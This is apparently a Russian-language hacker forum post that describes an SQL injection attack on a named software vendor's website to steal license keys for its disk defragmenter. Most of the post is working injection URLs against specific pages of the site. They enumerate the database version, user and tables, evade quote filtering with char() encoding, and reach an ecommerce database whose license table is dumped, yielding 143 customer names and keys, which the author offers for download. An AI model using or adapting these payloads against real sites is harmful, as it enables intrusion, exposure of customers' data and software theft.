Лицензируемся через SQL-injection =) Т.к. инфа не вызвала интерес в опр. кругах, решил выложить в паблик может кому пригодится... Просматривая как-то раздел "Сборник полезных прог(маст хев)" наткнулся на одну прогу: Название проги: PerfectDisk Тип проги: дефрагментатор Лицензия: Shareware Подробное описание: Мощный дефрагментатор жесткого диска, разработанный при поддержке Microsoft. Мне например отдефрагментировал диск который немогла отдефрагментирвать не одна программа до этого Линк для закачки: http://www.raxco.com/products/perfectdisk2k/ И так оф.сайт компании www.raxco.com Веб-сервер IIS, ну думаю наверно MSSQL и не ошибся. Порывшись немного нашел скуль: Code: http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=183+and+1 Далее стандартно версия, пользователь, имя БД: Code: http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=@@version-- http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(select+system_user)-- http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(select+db_name())-- Version:Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) User:webman - оказался полный лох =\ никаких прав на master(процедуры) и права на добавление, изменение, удаление даже в своей БД. DB:Testimonials Далее узнаем имена таблиц: Code: http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES Но дальнейший вывод таблиц не катил - причина фильтрация кавычек! Обходим: Code: http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN(char(84)%2Bchar(95)%2bchar(84)%2bchar(101)%2bchar(115)%2bchar(116)%2bchar(105)%2bchar(109)%2bchar(111)%2bchar(110)%2bchar(105)%2bchar(97)%2bchar(108)%2bchar(115)))-- Причем ручками преобразовывать каждое имя к последовательности чаров, запарило пришлось писать маленький конвертор на пхп...(ничего сложного) В результате в данной базе ниодной интересной таблицы =\ Сосвсем расстроился, но через несколько разделов сайта еще скуль: Code: http://www.raxco.com/products/commerce/purchase_options.cfm?ItemTitleID=1+or+1=(select+db_name())-- причем другая база!!! DB:RaxcoEcommerce - только одно название чего стоит =) Вытаскивал таблы минут 15, ппц запарился и все в ручную, приведу лишь малую часть запроса: Code: http://www.raxco.com/products/commerce/purchase_options.cfm?ItemTitleID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+LIKE+char(84)%2Bchar(95)%2Bchar(66)%2Bchar(101)%2Bchar(115)%2Bchar(116)%2Bchar(37)+AND+TABLE_NAME+NOT+IN(char(84)%2Bchar(95)%2Bchar(73)%2Bchar(116)%2Bchar(101)%2Bchar(109)%2Bchar(84)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101),char(84)%2Bchar(95)%2Bchar(80)%2Bchar(68)%2Bchar(82)%2Bchar(88)%2Bchar(76)%2Bchar(105)%2Bchar(99)%2Bchar(101)%2Bchar(110)%2Bchar(115)%2Bchar(101)%2Bchar(75)%2Bchar(101)%2Bchar(121)%2Bchar(115),char(84)%2Bchar(95)%2Bchar(66)%2Bchar(101)%2Bchar(115)%2Bchar(116)%2Bchar(80)%2Bchar(114)%2Bchar(105)%2Bchar(99)%2Bchar(101)%2Bchar(95)%2Bchar(71)%2Bchar(77),char(84)%2Bchar(95)%2Bchar(66)%2Bchar(101)%2Bchar(115)....... В результате имеем таблицы: Code: sysconstraints syssegments T_BestPrice_DR T_BestPrice_FR T_BestPrice_GM T_BestPrice_UK T_CountryCodes T_ExchangeRates T_Item T_ItemNFR T_ItemTitle T_Order T_OrderItem T_PDRXLicenseKeys T_ProductDownload T_PromoCodes T_SAOrder T_SAReorder T_TrackingCodes T_Values T_WebToOnyx Интересная естественно T_PDRXLicenseKeys, смотрим колонки: [T_PDRXLicenseKeys] Code: CreateDate CreatedBy CustomerEmail CustomerName LicenseId LicenseKey Ну а дальше дампим с помощью скрипта cash(ему кста огромный респ!) колонки CustomerName, LicenseKey В результате 143 лиценцзии в формате name:key! Здесь первые пять, думаю всем хватит: скачать Здесь описалово продукта http://www.raxco.com/products/PerfectDiskRxSuite/
